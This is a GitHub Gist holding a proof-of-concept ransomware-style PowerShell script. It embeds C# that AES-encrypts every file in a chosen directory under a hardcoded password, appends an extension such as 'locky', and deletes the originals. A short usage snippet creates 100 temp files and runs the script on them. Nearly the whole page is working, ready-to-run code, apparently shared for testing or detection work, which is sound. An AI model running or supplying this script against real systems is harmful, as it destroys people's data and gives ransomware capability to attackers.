Last active
September 29, 2020 22:36
-
-
Save 2XXE-SRA/c15b8520c663f4cecf99c6de7348014f to your computer and use it in GitHub Desktop.
poc crypto ransomware like script. encrypts all files in given directory
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-AESEncryptDirectory | |
| { | |
| param( | |
| [string]$directory, | |
| [string]$extension | |
| ) | |
| $csharp = @" | |
| //https://stackoverflow.com/questions/27645527/aes-encryption-on-large-files | |
| using System; | |
| using System.IO; | |
| using System.Security.Cryptography; | |
| public class CoolCryptor | |
| { | |
| public static void EncryptFile(string inputFile, string password, string ext) | |
| { | |
| //generate random salt | |
| byte[] salt = new byte[32]; | |
| RNGCryptoServiceProvider rng = new RNGCryptoServiceProvider(); | |
| // Ten iterations. | |
| for (int i = 0; i < 10; i++) | |
| { | |
| // Fill buffer. | |
| rng.GetBytes(salt); | |
| } | |
| //create output file name | |
| FileStream fsCrypt = new FileStream(inputFile + "." + ext, FileMode.Create); | |
| //convert password string to byte arrray | |
| byte[] passwordBytes = System.Text.Encoding.UTF8.GetBytes(password); | |
| //Set Rijndael symmetric encryption algorithm | |
| RijndaelManaged AES = new RijndaelManaged(); | |
| AES.KeySize = 256; | |
| AES.BlockSize = 128; | |
| AES.Padding = PaddingMode.PKCS7; | |
| //http://stackoverflow.com/questions/2659214/why-do-i-need-to-use-the-rfc2898derivebytes-class-in-net-instead-of-directly | |
| //"What it does is repeatedly hash the user password along with the salt." High iteration counts. | |
| Rfc2898DeriveBytes key = new Rfc2898DeriveBytes(passwordBytes, salt, 50000); | |
| AES.Key = key.GetBytes(AES.KeySize / 8); | |
| AES.IV = key.GetBytes(AES.BlockSize / 8); | |
| //Cipher modes: http://security.stackexchange.com/questions/52665/which-is-the-best-cipher-mode-and-padding-mode-for-aes-encryption | |
| AES.Mode = CipherMode.CFB; | |
| //write salt to the begining of the output file, so in this case can be random every time | |
| fsCrypt.Write(salt, 0, salt.Length); | |
| CryptoStream cs = new CryptoStream(fsCrypt, AES.CreateEncryptor(), CryptoStreamMode.Write); | |
| FileStream fsIn = new FileStream(inputFile, FileMode.Open); | |
| //create a buffer (1mb) so only this amount will allocate in the memory and not the whole file | |
| byte[] buffer = new byte[1048576]; | |
| int read; | |
| try | |
| { | |
| while ((read = fsIn.Read(buffer, 0, buffer.Length)) > 0) | |
| { | |
| //Application.DoEvents(); // -> for responsive GUI, using Task will be better! | |
| cs.Write(buffer, 0, read); | |
| } | |
| //close up | |
| fsIn.Close(); | |
| } | |
| catch (Exception ex) | |
| { | |
| Console.WriteLine("Error: " + ex.Message); | |
| } | |
| finally | |
| { | |
| cs.Close(); | |
| fsCrypt.Close(); | |
| } | |
| } | |
| } | |
| "@ | |
| $add = Add-Type -TypeDefinition $csharp -Language CSharp -PassThru | |
| $fullpath = (resolve-path $directory) | |
| get-childitem $fullpath | %{[CoolCryptor]::EncryptFile($_.FullName,"password",$extension); remove-item $_.FullName} | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //create some files in a temp directory | |
| 1..100 | %{new-item -type file -path "$_.txt"} | |
| //import script | |
| import-module .\coolcryptor.ps1 | |
| //encrypt files | |
| Invoke-AESEncryptDirectory -directory <dir w/ temp files> -extension <extension (e.g. locky)> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment